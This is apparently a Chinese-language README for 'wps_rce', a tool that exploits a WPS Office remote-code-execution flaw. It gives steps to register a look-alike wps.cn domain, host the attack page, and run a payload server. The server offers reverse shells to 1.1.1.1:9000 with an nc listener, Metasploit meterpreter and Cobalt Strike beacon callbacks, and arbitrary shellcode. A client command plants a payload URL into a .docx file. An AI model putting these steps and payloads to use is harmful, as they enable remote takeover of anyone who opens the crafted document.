Home

Awesome

WPS Office Rce

影响版本

漏洞介绍

什么是WebExtension

漏洞利用限制

  1. 购买***wps.cn的域名

Alt text

  1. 部署html文件到vps上,并且把域名绑定到vps

工具使用

git clone https://github.com/ba0gu0/wps_rce
cd wps_rce
pip install -r requirement.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

操作演示

https://github.com/ba0gu0/wps-rce/assets/19379443/b1d20c4b-a72f-4a95-9c80-10fc6ba4beff

服务端

cd server
python main.py

image-20230811153226311

image-20230811153844569

服务端功能

image-20230811154049949

url地址平台payload
/calc执行calc命令
/shell/1.1.1.1/9000all服务器监听:nc -lnvp 9000
/msf/tcp/1.1.1.1/9000msfwindows/meterpreter/reverse_tcp
/msf/http/1.1.1.1/80msfwindows/meterpreter/reverse_http
/msf/https/1.1.1.1/443msfwindows/meterpreter/reverse_https
/cs/http/1.1.1.1/80csBeacon http
/cs/https/1.1.1.1/443csBeacon https
/shellcode/base64_shellcode任意的windows可用的shellcode,需要进行base64编码

image-20230811154424873

客户端

cd client
python main.py ~/Downloads/temp.docx http://clientweb.docer.wps.cn.cloudwps.cn/shell/1.1.1.1/9000

image-20230811152820733

本地测试

实际利用